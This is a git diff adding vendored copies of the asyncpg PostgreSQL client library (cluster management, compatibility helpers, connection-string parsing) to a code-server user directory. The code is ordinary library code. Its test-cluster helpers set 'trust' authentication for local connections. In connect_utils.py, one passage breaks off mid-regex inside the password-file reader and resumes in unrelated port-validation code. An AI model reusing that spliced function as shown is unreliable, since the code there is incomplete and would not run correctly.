settings: + settings['encoding'] = 'UTF-8' + + if settings: + settings_args = ['--{}={}'.format(k, v) + for k, v in settings.items()] + extra_args = ['-o'] + [' '.join(settings_args)] + else: + extra_args = [] + + os.makedirs(self._data_dir, exist_ok=True) + process = subprocess.run( + [self._pg_ctl, 'init', '-D', self._data_dir] + extra_args, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + cwd=self._data_dir, + ) + + output = process.stdout + + if process.returncode != 0: + raise ClusterError( + 'pg_ctl init exited with status {:d}:\n{}'.format( + process.returncode, output.decode())) + + return output.decode() + + def start(self, wait=60, *, server_settings={}, **opts): + """Start the cluster.""" + status = self.get_status() + if status == 'running': + return + elif status == 'not-initialized': + raise ClusterError( + 'cluster in {!r} has not been initialized'.format( + self._data_dir)) + + port = opts.pop('port', None) + if port == 'dynamic': + port = find_available_port() + + extra_args = ['--{}={}'.format(k, v) for k, v in opts.items()] + extra_args.append('--port={}'.format(port)) + + sockdir = server_settings.get('unix_socket_directories') + if sockdir is None: + sockdir = server_settings.get('unix_socket_directory') + if sockdir is None and _system != 'Windows': + sockdir = tempfile.gettempdir() + + ssl_key = server_settings.get('ssl_key_file') + if ssl_key: + # Make sure server certificate key file has correct permissions. + keyfile = os.path.join(self._data_dir, 'srvkey.pem') + shutil.copy(ssl_key, keyfile) + os.chmod(keyfile, 0o600) + server_settings = server_settings.copy() + server_settings['ssl_key_file'] = keyfile + + if sockdir is not None: + if self._pg_version < (9, 3): + sockdir_opt = 'unix_socket_directory' + else: + sockdir_opt = 'unix_socket_directories' + + server_settings[sockdir_opt] = sockdir + + for k, v in server_settings.items(): + extra_args.extend(['-c', '{}={}'.format(k, v)]) + + if _system == 'Windows': + # On Windows we have to use pg_ctl as direct execution + # of postgres daemon under an Administrative account + # is not permitted and there is no easy way to drop + # privileges. + if os.getenv('ASYNCPG_DEBUG_SERVER'): + stdout = sys.stdout + print( + 'asyncpg.cluster: Running', + ' '.join([ + self._pg_ctl, 'start', '-D', self._data_dir, + '-o', ' '.join(extra_args) + ]), + file=sys.stderr, + ) + else: + stdout = subprocess.DEVNULL + + process = subprocess.run( + [self._pg_ctl, 'start', '-D', self._data_dir, + '-o', ' '.join(extra_args)], + stdout=stdout, + stderr=subprocess.STDOUT, + cwd=self._data_dir, + ) + + if process.returncode != 0: + if process.stderr: + stderr = ':\n{}'.format(process.stderr.decode()) + else: + stderr = '' + raise ClusterError( + 'pg_ctl start exited with status {:d}{}'.format( + process.returncode, stderr)) + else: + if os.getenv('ASYNCPG_DEBUG_SERVER'): + stdout = sys.stdout + else: + stdout = subprocess.DEVNULL + + self._daemon_process = \ + subprocess.Popen( + [self._postgres, '-D', self._data_dir, *extra_args], + stdout=stdout, + stderr=subprocess.STDOUT, + cwd=self._data_dir, + ) + + self._daemon_pid = self._daemon_process.pid + + self._test_connection(timeout=wait) + + def reload(self): + """Reload server configuration.""" + status = self.get_status() + if status != 'running': + raise ClusterError('cannot reload: cluster is not running') + + process = subprocess.run( + [self._pg_ctl, 'reload', '-D', self._data_dir], + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + cwd=self._data_dir, + ) + + stderr = process.stderr + + if process.returncode != 0: + raise ClusterError( + 'pg_ctl stop exited with status {:d}: {}'.format( + process.returncode, stderr.decode())) + + def stop(self, wait=60): + process = subprocess.run( + [self._pg_ctl, 'stop', '-D', self._data_dir, '-t', str(wait), + '-m', 'fast'], + stdout=subprocess.PIPE, + stderr=subprocess.PIPE, + cwd=self._data_dir, + ) + + stderr = process.stderr + + if process.returncode != 0: + raise ClusterError( + 'pg_ctl stop exited with status {:d}: {}'.format( + process.returncode, stderr.decode())) + + if (self._daemon_process is not None and + self._daemon_process.returncode is None): + self._daemon_process.kill() + + def destroy(self): + status = self.get_status() + if status == 'stopped' or status == 'not-initialized': + shutil.rmtree(self._data_dir) + else: + raise ClusterError('cannot destroy {} cluster'.format(status)) + + def _get_connection_spec(self): + if self._connection_addr is None: + self._connection_addr = self._connection_addr_from_pidfile() + + if self._connection_addr is not None: + if self._connection_spec_override: + args = self._connection_addr.copy() + args.update(self._connection_spec_override) + return args + else: + return self._connection_addr + + def get_connection_spec(self): + status = self.get_status() + if status != 'running': + raise ClusterError('cluster is not running') + + return self._get_connection_spec() + + def override_connection_spec(self, **kwargs): + self._connection_spec_override = kwargs + + def reset_wal(self, *, oid=None, xid=None): + status = self.get_status() + if status == 'not-initialized': + raise ClusterError( + 'cannot modify WAL status: cluster is not initialized') + + if status == 'running': + raise ClusterError( + 'cannot modify WAL status: cluster is running') + + opts = [] + if oid is not None: + opts.extend(['-o', str(oid)]) + if xid is not None: + opts.extend(['-x', str(xid)]) + if not opts: + return + + opts.append(self._data_dir) + + try: + reset_wal = self._find_pg_binary('pg_resetwal') + except ClusterError: + reset_wal = self._find_pg_binary('pg_resetxlog') + + process = subprocess.run( + [reset_wal] + opts, + stdout=subprocess.PIPE, stderr=subprocess.PIPE) + + stderr = process.stderr + + if process.returncode != 0: + raise ClusterError( + 'pg_resetwal exited with status {:d}: {}'.format( + process.returncode, stderr.decode())) + + def reset_hba(self): + """Remove all records from pg_hba.conf.""" + status = self.get_status() + if status == 'not-initialized': + raise ClusterError( + 'cannot modify HBA records: cluster is not initialized') + + pg_hba = os.path.join(self._data_dir, 'pg_hba.conf') + + try: + with open(pg_hba, 'w'): + pass + except IOError as e: + raise ClusterError( + 'cannot modify HBA records: {}'.format(e)) from e + + def add_hba_entry(self, *, type='host', database, user, address=None, + auth_method, auth_options=None): + """Add a record to pg_hba.conf.""" + status = self.get_status() + if status == 'not-initialized': + raise ClusterError( + 'cannot modify HBA records: cluster is not initialized') + + if type not in {'local', 'host', 'hostssl', 'hostnossl'}: + raise ValueError('invalid HBA record type: {!r}'.format(type)) + + pg_hba = os.path.join(self._data_dir, 'pg_hba.conf') + + record = '{} {} {}'.format(type, database, user) + + if type != 'local': + if address is None: + raise ValueError( + '{!r} entry requires a valid address'.format(type)) + else: + record += ' {}'.format(address) + + record += ' {}'.format(auth_method) + + if auth_options is not None: + record += ' ' + ' '.join( + '{}={}'.format(k, v) for k, v in auth_options) + + try: + with open(pg_hba, 'a') as f: + print(record, file=f) + except IOError as e: + raise ClusterError( + 'cannot modify HBA records: {}'.format(e)) from e + + def trust_local_connections(self): + self.reset_hba() + + if _system != 'Windows': + self.add_hba_entry(type='local', database='all', + user='all', auth_method='trust') + self.add_hba_entry(type='host', address='127.0.0.1/32', + database='all', user='all', + auth_method='trust') + self.add_hba_entry(type='host', address='::1/128', + database='all', user='all', + auth_method='trust') + status = self.get_status() + if status == 'running': + self.reload() + + def trust_local_replication_by(self, user): + if _system != 'Windows': + self.add_hba_entry(type='local', database='replication', + user=user, auth_method='trust') + self.add_hba_entry(type='host', address='127.0.0.1/32', + database='replication', user=user, + auth_method='trust') + self.add_hba_entry(type='host', address='::1/128', + database='replication', user=user, + auth_method='trust') + status = self.get_status() + if status == 'running': + self.reload() + + def _init_env(self): + if not self._pg_bin_dir: + pg_config = self._find_pg_config(self._pg_config_path) + pg_config_data = self._run_pg_config(pg_config) + + self._pg_bin_dir = pg_config_data.get('bindir') + if not self._pg_bin_dir: + raise ClusterError( + 'pg_config output did not provide the BINDIR value') + + self._pg_ctl = self._find_pg_binary('pg_ctl') + self._postgres = self._find_pg_binary('postgres') + self._pg_version = self._get_pg_version() + + def _connection_addr_from_pidfile(self): + pidfile = os.path.join(self._data_dir, 'postmaster.pid') + + try: + with open(pidfile, 'rt') as f: + piddata = f.read() + except FileNotFoundError: + return None + + lines = piddata.splitlines() + + if len(lines) < 6: + # A complete postgres pidfile is at least 6 lines + return None + + pmpid = int(lines[0]) + if self._daemon_pid and pmpid != self._daemon_pid: + # This might be an old pidfile left from previous postgres + # daemon run. + return None + + portnum = lines[3] + sockdir = lines[4] + hostaddr = lines[5] + + if sockdir: + if sockdir[0] != '/': + # Relative sockdir + sockdir = os.path.normpath( + os.path.join(self._data_dir, sockdir)) + host_str = sockdir + else: + host_str = hostaddr + + if host_str == '*': + host_str = 'localhost' + elif host_str == '0.0.0.0': + host_str = '127.0.0.1' + elif host_str == '::': + host_str = '::1' + + return { + 'host': host_str, + 'port': portnum + } + + def _test_connection(self, timeout=60): + self._connection_addr = None + + loop = asyncio.new_event_loop() + + try: + for i in range(timeout): + if self._connection_addr is None: + conn_spec = self._get_connection_spec() + if conn_spec is None: + time.sleep(1) + continue + + try: + con = loop.run_until_complete( + asyncpg.connect(database='postgres', + user='postgres', + timeout=5, loop=loop, + **self._connection_addr)) + except (OSError, asyncio.TimeoutError, + asyncpg.CannotConnectNowError, + asyncpg.PostgresConnectionError): + time.sleep(1) + continue + except asyncpg.PostgresError: + # Any other error other than ServerNotReadyError or + # ConnectionError is interpreted to indicate the server is + # up. + break + else: + loop.run_until_complete(con.close()) + break + finally: + loop.close() + + return 'running' + + def _run_pg_config(self, pg_config_path): + process = subprocess.run( + pg_config_path, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + stdout, stderr = process.stdout, process.stderr + + if process.returncode != 0: + raise ClusterError('pg_config exited with status {:d}: {}'.format( + process.returncode, stderr)) + else: + config = {} + + for line in stdout.splitlines(): + k, eq, v = line.decode('utf-8').partition('=') + if eq: + config[k.strip().lower()] = v.strip() + + return config + + def _find_pg_config(self, pg_config_path): + if pg_config_path is None: + pg_install = ( + os.environ.get('PGINSTALLATION') + or os.environ.get('PGBIN') + ) + if pg_install: + pg_config_path = platform_exe( + os.path.join(pg_install, 'pg_config')) + else: + pathenv = os.environ.get('PATH').split(os.pathsep) + for path in pathenv: + pg_config_path = platform_exe( + os.path.join(path, 'pg_config')) + if os.path.exists(pg_config_path): + break + else: + pg_config_path = None + + if not pg_config_path: + raise ClusterError('could not find pg_config executable') + + if not os.path.isfile(pg_config_path): + raise ClusterError('{!r} is not an executable'.format( + pg_config_path)) + + return pg_config_path + + def _find_pg_binary(self, binary): + bpath = platform_exe(os.path.join(self._pg_bin_dir, binary)) + + if not os.path.isfile(bpath): + raise ClusterError( + 'could not find {} executable: '.format(binary) + + '{!r} does not exist or is not a file'.format(bpath)) + + return bpath + + def _get_pg_version(self): + process = subprocess.run( + [self._postgres, '--version'], + stdout=subprocess.PIPE, stderr=subprocess.PIPE) + stdout, stderr = process.stdout, process.stderr + + if process.returncode != 0: + raise ClusterError( + 'postgres --version exited with status {:d}: {}'.format( + process.returncode, stderr)) + + version_string = stdout.decode('utf-8').strip(' \n') + prefix = 'postgres (PostgreSQL) ' + if not version_string.startswith(prefix): + raise ClusterError( + 'could not determine server version from {!r}'.format( + version_string)) + version_string = version_string[len(prefix):] + + return serverversion.split_server_version_string(version_string) + + +class TempCluster(Cluster): + def __init__(self, *, + data_dir_suffix=None, data_dir_prefix=None, + data_dir_parent=None, pg_config_path=None): + self._data_dir = _mkdtemp(suffix=data_dir_suffix, + prefix=data_dir_prefix, + dir=data_dir_parent) + super().__init__(self._data_dir, pg_config_path=pg_config_path) + + +class HotStandbyCluster(TempCluster): + def __init__(self, *, + master, replication_user, + data_dir_suffix=None, data_dir_prefix=None, + data_dir_parent=None, pg_config_path=None): + self._master = master + self._repl_user = replication_user + super().__init__( + data_dir_suffix=data_dir_suffix, + data_dir_prefix=data_dir_prefix, + data_dir_parent=data_dir_parent, + pg_config_path=pg_config_path) + + def _init_env(self): + super()._init_env() + self._pg_basebackup = self._find_pg_binary('pg_basebackup') + + def init(self, **settings): + """Initialize cluster.""" + if self.get_status() != 'not-initialized': + raise ClusterError( + 'cluster in {!r} has already been initialized'.format( + self._data_dir)) + + process = subprocess.run( + [self._pg_basebackup, '-h', self._master['host'], + '-p', self._master['port'], '-D', self._data_dir, + '-U', self._repl_user], + stdout=subprocess.PIPE, stderr=subprocess.STDOUT) + + output = process.stdout + + if process.returncode != 0: + raise ClusterError( + 'pg_basebackup init exited with status {:d}:\n{}'.format( + process.returncode, output.decode())) + + if self._pg_version < (12, 0): + with open(os.path.join(self._data_dir, 'recovery.conf'), 'w') as f: + f.write(textwrap.dedent("""\ + standby_mode = 'on' + primary_conninfo = 'host={host} port={port} user={user}' + """.format( + host=self._master['host'], + port=self._master['port'], + user=self._repl_user))) + else: + f = open(os.path.join(self._data_dir, 'standby.signal'), 'w') + f.close() + + return output.decode() + + def start(self, wait=60, *, server_settings={}, **opts): + if self._pg_version >= (12, 0): + server_settings = server_settings.copy() + server_settings['primary_conninfo'] = ( + '"host={host} port={port} user={user}"'.format( + host=self._master['host'], + port=self._master['port'], + user=self._repl_user, + ) + ) + + super().start(wait=wait, server_settings=server_settings, **opts) + + +class RunningCluster(Cluster): + def __init__(self, **kwargs): + self.conn_spec = kwargs + + def is_managed(self): + return False + + def get_connection_spec(self): + return dict(self.conn_spec) + + def get_status(self): + return 'running' + + def init(self, **settings): + pass + + def start(self, wait=60, **settings): + pass + + def stop(self, wait=60): + pass + + def destroy(self): + pass + + def reset_hba(self): + raise ClusterError('cannot modify HBA records of unmanaged cluster') + + def add_hba_entry(self, *, type='host', database, user, address=None, + auth_method, auth_options=None): + raise ClusterError('cannot modify HBA records of unmanaged cluster') diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/compat.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/compat.py new file mode 100755 index 0000000..57eec65 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/compat.py @@ -0,0 +1,88 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + +from __future__ import annotations + +import enum +import pathlib +import platform +import typing +import sys + +if typing.TYPE_CHECKING: + import asyncio + +SYSTEM: typing.Final = platform.uname().system + + +if sys.platform == 'win32': + import ctypes.wintypes + + CSIDL_APPDATA: typing.Final = 0x001a + + def get_pg_home_directory() -> pathlib.Path | None: + # We cannot simply use expanduser() as that returns the user's + # home directory, whereas Postgres stores its config in + # %AppData% on Windows. + buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH) + r = ctypes.windll.shell32.SHGetFolderPathW(0, CSIDL_APPDATA, 0, 0, buf) + if r: + return None + else: + return pathlib.Path(buf.value) / 'postgresql' + +else: + def get_pg_home_directory() -> pathlib.Path | None: + try: + return pathlib.Path.home() + except (RuntimeError, KeyError): + return None + + +async def wait_closed(stream: asyncio.StreamWriter) -> None: + # Not all asyncio versions have StreamWriter.wait_closed(). + if hasattr(stream, 'wait_closed'): + try: + await stream.wait_closed() + except ConnectionResetError: + # On Windows wait_closed() sometimes propagates + # ConnectionResetError which is totally unnecessary. + pass + + +if sys.version_info < (3, 12): + def markcoroutinefunction(c): # type: ignore + pass +else: + from inspect import markcoroutinefunction # noqa: F401 + + +if sys.version_info < (3, 12): + from ._asyncio_compat import wait_for as wait_for # noqa: F401 +else: + from asyncio import wait_for as wait_for # noqa: F401 + + +if sys.version_info < (3, 11): + from ._asyncio_compat import timeout_ctx as timeout # noqa: F401 +else: + from asyncio import timeout as timeout # noqa: F401 + +if sys.version_info < (3, 9): + from typing import ( # noqa: F401 + Awaitable as Awaitable, + ) +else: + from collections.abc import ( # noqa: F401 + Awaitable as Awaitable, + ) + +if sys.version_info < (3, 11): + class StrEnum(str, enum.Enum): + __str__ = str.__str__ + __repr__ = enum.Enum.__repr__ +else: + from enum import StrEnum as StrEnum # noqa: F401 diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/connect_utils.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/connect_utils.py new file mode 100755 index 0000000..07c4fdd --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/connect_utils.py @@ -0,0 +1,1313 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + +from __future__ import annotations + +import asyncio +import configparser +import collections +from collections.abc import Callable +import enum +import functools +import getpass +import os +import pathlib +import platform +import random +import re +import socket +import ssl as ssl_module +import stat +import struct +import sys +import typing +import urllib.parse +import warnings +import inspect + +from . import compat +from . import exceptions +from . import protocol + + +class SSLMode(enum.IntEnum): + disable = 0 + allow = 1 + prefer = 2 + require = 3 + verify_ca = 4 + verify_full = 5 + + @classmethod + def parse(cls, sslmode): + if isinstance(sslmode, cls): + return sslmode + return getattr(cls, sslmode.replace('-', '_')) + + +class SSLNegotiation(compat.StrEnum): + postgres = "postgres" + direct = "direct" + + +_ConnectionParameters = collections.namedtuple( + 'ConnectionParameters', + [ + 'user', + 'password', + 'database', + 'ssl', + 'sslmode', + 'ssl_negotiation', + 'server_settings', + 'target_session_attrs', + 'krbsrvname', + 'gsslib', + ]) + + +_ClientConfiguration = collections.namedtuple( + 'ConnectionConfiguration', + [ + 'command_timeout', + 'statement_cache_size', + 'max_cached_statement_lifetime', + 'max_cacheable_statement_size', + ]) + + +_system = platform.uname().system + + +if _system == 'Windows': + PGPASSFILE = 'pgpass.conf' +else: + PGPASSFILE = '.pgpass' + + +PG_SERVICEFILE = '.pg_service.conf' + + +def _read_password_file(passfile: pathlib.Path) \ + -> typing.List[typing.Tuple[str, ...]]: + + passtab = [] + + try: + if not passfile.exists(): + return [] + + if not passfile.is_file(): + warnings.warn( + 'password file {!r} is not a plain file'.format(passfile)) + + return [] + + if _system != 'Windows': + if passfile.stat().st_mode & (stat.S_IRWXG | stat.S_IRWXO): + warnings.warn( + 'password file {!r} has group or world access; ' + 'permissions should be u=rw (0600) or less'.format( + passfile)) + + return [] + + with passfile.open('rt') as f: + for line in f: + line = line.strip() + if not line or line.startswith('#'): + # Skip empty lines and comments. + continue + # Backslash escapes both itself and the colon, + # which is a record separator. + line = line.replace(R'\\', '\n') + passtab.append(tuple( + p.replace('\n', R'\\') + for p in re.split(r'(? 1: + # If there is a list of ports, its length must + # match that of the host list. + if len(port) != len(hosts): + raise exceptions.ClientConfigurationError( + 'could not match {} port numbers to {} hosts'.format( + len(port), len(hosts))) + elif isinstance(port, list) and len(port) == 1: + port = [port[0] for _ in range(len(hosts))] + else: + port = [port for _ in range(len(hosts))] + + return port + + +def _parse_hostlist(hostlist, port, *, unquote=False): + if ',' in hostlist: + # A comma-separated list of host addresses. + hostspecs = hostlist.split(',') + else: + hostspecs = [hostlist] + + hosts = [] + hostlist_ports = [] + + if not port: + portspec = os.environ.get('PGPORT') + if portspec: + if ',' in portspec: + default_port = [int(p) for p in portspec.split(',')] + else: + default_port = int(portspec) + else: + default_port = 5432 + + default_port = _validate_port_spec(hostspecs, default_port) + + else: + port = _validate_port_spec(hostspecs, port) + + for i, hostspec in enumerate(hostspecs): + if hostspec[0] == '/': + # Unix socket + addr = hostspec + hostspec_port = '' + elif hostspec[0] == '[': + # IPv6 address + m = re.match(r'(?:\[([^\]]+)\])(?::([0-9]+))?', hostspec) + if m: + addr = m.group(1) + hostspec_port = m.group(2) + else: + raise exceptions.ClientConfigurationError( + 'invalid IPv6 address in the connection URI: {!r}'.format( + hostspec + ) + ) + else: + # IPv4 address + addr, _, hostspec_port = hostspec.partition(':') + + if unquote: + addr = urllib.parse.unquote(addr) + + hosts.append(addr) + if not port: + if hostspec_port: + if unquote: + hostspec_port = urllib.parse.unquote(hostspec_port) + hostlist_ports.append(int(hostspec_port)) + else: + hostlist_ports.append(default_port[i]) + + if not port: + port = hostlist_ports + + return hosts, port + + +def _parse_tls_version(tls_version): + if tls_version.startswith('SSL'): + raise exceptions.ClientConfigurationError( + f"Unsupported TLS version: {tls_version}" + ) + try: + return ssl_module.TLSVersion[tls_version.replace('.', '_')] + except KeyError: + raise exceptions.ClientConfigurationError( + f"No such TLS version: {tls_version}" + ) + + +def _dot_postgresql_path(filename) -> typing.Optional[pathlib.Path]: + try: + homedir = pathlib.Path.home() + except (RuntimeError, KeyError): + return None + + return (homedir / '.postgresql' / filename).resolve() + + +def _parse_connect_dsn_and_args(*, dsn, host, port, user, + password, passfile, database, ssl, + service, servicefile, + direct_tls, server_settings, + target_session_attrs, krbsrvname, gsslib): + # `auth_hosts` is the version of host information for the purposes + # of reading the pgpass file. + auth_hosts = None + sslcert = sslkey = sslrootcert = sslcrl = sslpassword = None + ssl_min_protocol_version = ssl_max_protocol_version = None + sslnegotiation = None + + if dsn: + parsed = urllib.parse.urlparse(dsn) + + query = None + if parsed.query: + query = urllib.parse.parse_qs(parsed.query, strict_parsing=True) + for key, val in query.items(): + if isinstance(val, list): + query[key] = val[-1] + + if 'service' in query: + val = query.pop('service') + if not service and val: + service = val + + connection_service_file = servicefile + + if connection_service_file is None: + connection_service_file = os.getenv('PGSERVICEFILE') + + if connection_service_file is None: + homedir = compat.get_pg_home_directory() + if homedir: + connection_service_file = homedir / PG_SERVICEFILE + else: + connection_service_file = None + else: + connection_service_file = pathlib.Path(connection_service_file) + + if parsed.scheme not in {'postgresql', 'postgres'}: + raise exceptions.ClientConfigurationError( + 'invalid DSN: scheme is expected to be either ' + '"postgresql" or "postgres", got {!r}'.format(parsed.scheme)) + + if parsed.netloc: + if '@' in parsed.netloc: + dsn_auth, _, dsn_hostspec = parsed.netloc.partition('@') + else: + dsn_hostspec = parsed.netloc + dsn_auth = '' + else: + dsn_auth = dsn_hostspec = '' + + if dsn_auth: + dsn_user, _, dsn_password = dsn_auth.partition(':') + else: + dsn_user = dsn_password = '' + + if not host and dsn_hostspec: + host, port = _parse_hostlist(dsn_hostspec, port, unquote=True) + + if parsed.path and database is None: + dsn_database = parsed.path + if dsn_database.startswith('/'): + dsn_database = dsn_database[1:] + database = urllib.parse.unquote(dsn_database) + + if user is None and dsn_user: + user = urllib.parse.unquote(dsn_user) + + if password is None and dsn_password: + password = urllib.parse.unquote(dsn_password) + + if query: + + if 'port' in query: + val = query.pop('port') + if not port and val: + port = [int(p) for p in val.split(',')] + + if 'host' in query: + val = query.pop('host') + if not host and val: + host, port = _parse_hostlist(val, port) + + if 'dbname' in query: + val = query.pop('dbname') + if database is None: + database = val + + if 'database' in query: + val = query.pop('database') + if database is None: + database = val + + if 'user' in query: + val = query.pop('user') + if user is None: + user = val + + if 'password' in query: + val = query.pop('password') + if password is None: + password = val + + if 'passfile' in query: + val = query.pop('passfile') + if passfile is None: + passfile = val + + if 'sslmode' in query: + val = query.pop('sslmode') + if ssl is None: + ssl = val + + if 'sslcert' in query: + sslcert = query.pop('sslcert') + + if 'sslkey' in query: + sslkey = query.pop('sslkey') + + if 'sslrootcert' in query: + sslrootcert = query.pop('sslrootcert') + + if 'sslnegotiation' in query: + sslnegotiation = query.pop('sslnegotiation') + + if 'sslcrl' in query: + sslcrl = query.pop('sslcrl') + + if 'sslpassword' in query: + sslpassword = query.pop('sslpassword') + + if 'ssl_min_protocol_version' in query: + ssl_min_protocol_version = query.pop( + 'ssl_min_protocol_version' + ) + + if 'ssl_max_protocol_version' in query: + ssl_max_protocol_version = query.pop( + 'ssl_max_protocol_version' + ) + + if 'target_session_attrs' in query: + dsn_target_session_attrs = query.pop( + 'target_session_attrs' + ) + if target_session_attrs is None: + target_session_attrs = dsn_target_session_attrs + + if 'krbsrvname' in query: + val = query.pop('krbsrvname') + if krbsrvname is None: + krbsrvname = val + + if 'gsslib' in query: + val = query.pop('gsslib') + if gsslib is None: + gsslib = val + + if 'service' in query: + val = query.pop('service') + if service is None: + service = val + + if query: + if server_settings is None: + server_settings = query + else: + server_settings = {**query, **server_settings} + + if connection_service_file is not None and service is not None: + pg_service = configparser.ConfigParser() + pg_service.read(connection_service_file) + if service in pg_service.sections(): + service_params = pg_service[service] + if 'port' in service_params: + val = service_params.pop('port') + if not port and val: + port = [int(p) for p in val.split(',')] + + if 'host' in service_params: + val = service_params.pop('host') + if not host and val: + host, port = _parse_hostlist(val, port) + + if 'dbname' in service_params: + val = service_params.pop('dbname') + if database is None: + database = val + + if 'database' in service_params: + val = service_params.pop('database') + if database is None: + database = val + + if 'user' in service_params: + val = service_params.pop('user') + if user is None: + user = val + + if 'password' in service_params: + val = service_params.pop('password') + if password is None: + password = val + + if 'passfile' in service_params: + val = service_params.pop('passfile') + if passfile is None: + passfile = val + + if 'sslmode' in service_params: + val = service_params.pop('sslmode') + if ssl is None: + ssl = val + + if 'sslcert' in service_params: + val = service_params.pop('sslcert') + if sslcert is None: + sslcert = val + + if 'sslkey' in service_params: + val = service_params.pop('sslkey') + if sslkey is None: + sslkey = val + + if 'sslrootcert' in service_params: + val = service_params.pop('sslrootcert') + if sslrootcert is None: + sslrootcert = val + + if 'sslnegotiation' in service_params: + val = service_params.pop('sslnegotiation') + if sslnegotiation is None: + sslnegotiation = val + + if 'sslcrl' in service_params: + val = service_params.pop('sslcrl') + if sslcrl is None: + sslcrl = val + + if 'sslpassword' in service_params: + val = service_params.pop('sslpassword') + if sslpassword is None: + sslpassword = val + + if 'ssl_min_protocol_version' in service_params: + val = service_params.pop( + 'ssl_min_protocol_version' + ) + if ssl_min_protocol_version is None: + ssl_min_protocol_version = val + + if 'ssl_max_protocol_version' in service_params: + val = service_params.pop( + 'ssl_max_protocol_version' + ) + if ssl_max_protocol_version is None: + ssl_max_protocol_version = val + + if 'target_session_attrs' in service_params: + dsn_target_session_attrs = service_params.pop( + 'target_session_attrs' + ) + if target_session_attrs is None: + target_session_attrs = dsn_target_session_attrs + + if 'krbsrvname' in service_params: + val = service_params.pop('krbsrvname') + if krbsrvname is None: + krbsrvname = val + + if 'gsslib' in service_params: + val = service_params.pop('gsslib') + if gsslib is None: + gsslib = val + if not service: + service = os.environ.get('PGSERVICE') + if not host: + hostspec = os.environ.get('PGHOST') + if hostspec: + host, port = _parse_hostlist(hostspec, port) + + if not host: + auth_hosts = ['localhost'] + + if _system == 'Windows': + host = ['localhost'] + else: + host = ['/run/postgresql', '/var/run/postgresql', + '/tmp', '/private/tmp', 'localhost'] + + if not isinstance(host, (list, tuple)): + host = [host] + + if auth_hosts is None: + auth_hosts = host + + if not port: + portspec = os.environ.get('PGPORT') + if portspec: + if ',' in portspec: + port = [int(p) for p in portspec.split(',')] + else: + port = int(portspec) + else: + port = 5432 + + elif isinstance(port, (list, tuple)): + port = [int(p) for p in port] + + else: + port = int(port) + + port = _validate_port_spec(host, port) + + if user is None: + user = os.getenv('PGUSER') + if not user: + user = getpass.getuser() + + if password is None: + password = os.getenv('PGPASSWORD') + + if database is None: + database = os.getenv('PGDATABASE') + + if database is None: + database = user + + if user is None: + raise exceptions.ClientConfigurationError( + 'could not determine user name to connect with') + + if database is None: + raise exceptions.ClientConfigurationError( + 'could not determine database name to connect to') + + if password is None: + if passfile is None: + passfile = os.getenv('PGPASSFILE') + + if passfile is None: + homedir = compat.get_pg_home_directory() + if homedir: + passfile = homedir / PGPASSFILE + else: + passfile = None + else: + passfile = pathlib.Path(passfile) + + if passfile is not None: + password = _read_password_from_pgpass( + hosts=auth_hosts, ports=port, + database=database, user=user, + passfile=passfile) + + addrs = [] + have_tcp_addrs = False + for h, p in zip(host, port): + if h.startswith('/'): + # UNIX socket name + if '.s.PGSQL.' not in h: + h = os.path.join(h, '.s.PGSQL.{}'.format(p)) + addrs.append(h) + else: + # TCP host/port + addrs.append((h, p)) + have_tcp_addrs = True + + if not addrs: + raise exceptions.InternalClientError( + 'could not determine the database address to connect to') + + if ssl is None: + ssl = os.getenv('PGSSLMODE') + + if ssl is None and have_tcp_addrs: + ssl = 'prefer' + + if direct_tls is not None: + sslneg = ( + SSLNegotiation.direct if direct_tls else SSLNegotiation.postgres + ) + else: + if sslnegotiation is None: + sslnegotiation = os.environ.get("PGSSLNEGOTIATION") + + if sslnegotiation is not None: + try: + sslneg = SSLNegotiation(sslnegotiation) + except ValueError: + modes = ', '.join( + m.name.replace('_', '-') + for m in SSLNegotiation + ) + raise exceptions.ClientConfigurationError( + f'`sslnegotiation` parameter must be one of: {modes}' + ) from None + else: + sslneg = SSLNegotiation.postgres + + if isinstance(ssl, (str, SSLMode)): + try: + sslmode = SSLMode.parse(ssl) + except AttributeError: + modes = ', '.join(m.name.replace('_', '-') for m in SSLMode) + raise exceptions.ClientConfigurationError( + '`sslmode` parameter must be one of: {}'.format(modes) + ) from None + + # docs at https://www.postgresql.org/docs/10/static/libpq-connect.html + if sslmode < SSLMode.allow: + ssl = False + else: + ssl = ssl_module.SSLContext(ssl_module.PROTOCOL_TLS_CLIENT) + ssl.check_hostname = sslmode >= SSLMode.verify_full + if sslmode < SSLMode.require: + ssl.verify_mode = ssl_module.CERT_NONE + else: + if sslrootcert is None: + sslrootcert = os.getenv('PGSSLROOTCERT') + if sslrootcert: + ssl.load_verify_locations(cafile=sslrootcert) + ssl.verify_mode = ssl_module.CERT_REQUIRED + else: + try: + sslrootcert = _dot_postgresql_path('root.crt') + if sslrootcert is not None: + ssl.load_verify_locations(cafile=sslrootcert) + else: + raise exceptions.ClientConfigurationError( + 'cannot determine location of user ' + 'PostgreSQL configuration directory' + ) + except ( + exceptions.ClientConfigurationError, + FileNotFoundError, + NotADirectoryError, + ): + if sslmode > SSLMode.require: + if sslrootcert is None: + sslrootcert = '~/.postgresql/root.crt' + detail = ( + 'Could not determine location of user ' + 'home directory (HOME is either unset, ' + 'inaccessible, or does not point to a ' + 'valid directory)' + ) + else: + detail = None + raise exceptions.ClientConfigurationError( + f'root certificate file "{sslrootcert}" does ' + f'not exist or cannot be accessed', + hint='Provide the certificate file directly ' + f'or make sure "{sslrootcert}" ' + 'exists and is readable.', + detail=detail, + ) + elif sslmode == SSLMode.require: + ssl.verify_mode = ssl_module.CERT_NONE + else: + assert False, 'unreachable' + else: + ssl.verify_mode = ssl_module.CERT_REQUIRED + + if sslcrl is None: + sslcrl = os.getenv('PGSSLCRL') + if sslcrl: + ssl.load_verify_locations(cafile=sslcrl) + ssl.verify_flags |= 